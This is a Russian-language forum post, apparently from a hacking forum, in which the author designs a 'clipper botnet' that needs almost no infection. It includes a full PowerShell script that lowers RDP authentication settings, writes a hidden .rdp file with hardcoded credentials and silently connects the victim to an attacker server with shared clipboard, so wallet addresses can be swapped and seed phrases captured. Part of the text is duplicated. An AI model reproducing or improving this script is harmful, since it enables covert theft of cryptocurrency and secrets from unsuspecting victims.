В общем допустим на удаленном сервере стоит клиппер.
Жертва запускает скрипт(он работает да, скрыто):
Скрипт скрыто запускает подключение к rdp на котром стоит клиппер, буфер обмена общий по этому все что после подключения копирует жертва уходит на анализ серверу.
Вот я и размышляю собственно
Проблема 1: Реально ли поднять многосессионный сервер < да же хз как правильно сформулировать что бы буфер меня сразу у всех подключенных юзеров но не передавал между ними их же буфер и менял каждому отдельно если нашел валет.
Проблема 2: в Коде жестко прописанны данные подключения, но тут уже дело настройки самой винды.
Суть проста клиппер ботнет почти без заражения. Ток ps файл 1 который откроет RDP на котором уже стоит подмена, а буфер то общий.
Пока просто размышляю...
Так же можно мониторить появление в буфере сидок и прочего. Или все это е**** колхоз?
ну и в принципе для точечных атак это уже подходит.
Жертва запускает скрипт(он работает да, скрыто):
Bash:
param(
[string]$Server = "192.168.1.1",
[string]$Username = "Администратор",
[string]$Password = "123"
)
function Set-RDPRegistrySettings {
$regPath = "HKCU:\Software\Microsoft\Terminal Server Client"
if (-not (Test-Path $regPath)) {
New-Item -Path $regPath -Force | Out-Null
}
Set-ItemProperty -Path $regPath -Name "Authentication Level" -Value 0 -Type DWord -Force
$localDevicesPath = "$regPath\LocalDevices"
if (-not (Test-Path $localDevicesPath)) {
New-Item -Path $localDevicesPath -Force | Out-Null
}
Set-ItemProperty -Path $localDevicesPath -Name $Server -Value 255 -Type DWord -Force
}
function Create-RDPFile {
param($server, $user)
$content = @"
enable credssp support:i:0
authentication level:i:0
negotiate security layer:i:0
redirected authentication:i:0
allow desktop composition:i:0
allow font smoothing:i:0
disable full window drag:i:1
disable menu anims:i:1
disable themes:i:0
disable cursor setting:i:0
bitmapcachepersistenable:i:1
full address:s:$server
username:s:$user
alternate shell:s:
shell working directory:s:
disableconnectionsharing:i:1
prompt for credentials:i:0
administrative session:i:1
promptcredentialonce:i:1
gatewaycredentialssource:i:4
gatewayusagemethod:i:2
redirectclipboard:i:1
redirectprinters:i:0
redirectcomports:i:0
redirectsmartcards:i:0
redirectposdevices:i:0
drivestoredirect:s:
camerastoredirect:s:
videoplaybackmode:i:1
audiocapturemode:i:0
audiomode:i:0
enablesuperpan:i:1
superpanaccelerationfactor:i:1
bandwidthautodetect:i:1
connection type:i:2
networkautodetect:i:1
"@
return $content
}
Set-RDPRegistrySettings
$rdpContent = Create-RDPFile $Server $Username
$tempFile = "$env:TEMP\$([System.Guid]::NewGuid()).rdp"
try {
$rdpContent | Out-File -FilePath $tempFile -Encoding ASCII
$process = Start-Process "mstsc.exe" -ArgumentList "`"$tempFile`"" -PassThru -WindowStyle Hidden
Start-Sleep -Seconds 3
Start-Sleep -Seconds 5
if (Test-Path $tempFile) {
Remove-Item $tempFile -Force
}
} catch {}Вот я и размышляю собственно
Проблема 1: Реально ли поднять многосессионный сервер < да же хз как правильно сформулировать что бы буфер меня сразу у всех подключенных юзеров но не передавал между ними их же буфер и менял каждому отдельно если нашел валет.
Проблема 2: в Коде жестко прописанны данные подключения, но тут уже дело настройки самой винды.
Суть проста клиппер ботнет почти без заражения. Ток ps файл 1 который откроет RDP на котором уже стоит подмена, а буфер то общий.
Пока просто размышляю...
Так же можно мониторить появление в буфере сидок и прочего. Или все это е**** колхоз?
ну и в принципе для точечных атак это уже подходит.
Последнее редактирование:
но в теории действительно не очень палевый.